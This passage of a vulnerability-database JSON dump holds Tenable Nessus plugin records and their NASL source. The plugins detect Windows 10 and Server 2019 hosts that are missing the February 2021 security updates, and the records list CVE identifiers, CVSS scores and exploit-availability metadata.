script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601354');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601354])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-21T14:26:20", "description": "The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601315: Windows 10 Version 1909 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601315.NASL", "href": "https://www.tenable.com/plugins/nessus/146326", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146326);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601315\");\n script_xref(name:\"MSFT\", value:\"MS21-4601315\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601315: Windows 10 Version 1909 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/topic/february-9-2021-kb4601315-os-build-18363-1377-bdd71d2f-6729-e22a-3150-64324e4ab954\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93fc3ad3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601315.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601315');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601315])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-21T14:27:02", "description": "The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24078, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601345.NASL", "href": "https://www.tenable.com/plugins/nessus/146337", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146337);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601345\");\n script_xref(name:\"MSFT\", value:\"MS21-4601345\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24078,\n CVE-2021-24081, CVE-2021-24083, CVE-2021-24088,\n CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/office/february-9-2021%e2%80%94kb4601345-os-build-17763-1757-c38b7b85-0d84-d979-1a29-e4ba97b82042?ui=en-US&rs=en-US&ad=US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0231130\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601345.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601345');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601345])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-21T14:27:02", "description": "The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24075, CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601319: Windows 10 version 2004 Feb 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601319.NASL", "href": "https://www.tenable.com/plugins/nessus/146345", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146345);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24075\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601319\");\n script_xref(name:\"MSFT\", value:\"MS21-4601319\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601319: Windows 10 version 2004 Feb 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24075,\n CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4601319\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4601319 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list(\n '4601319'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, 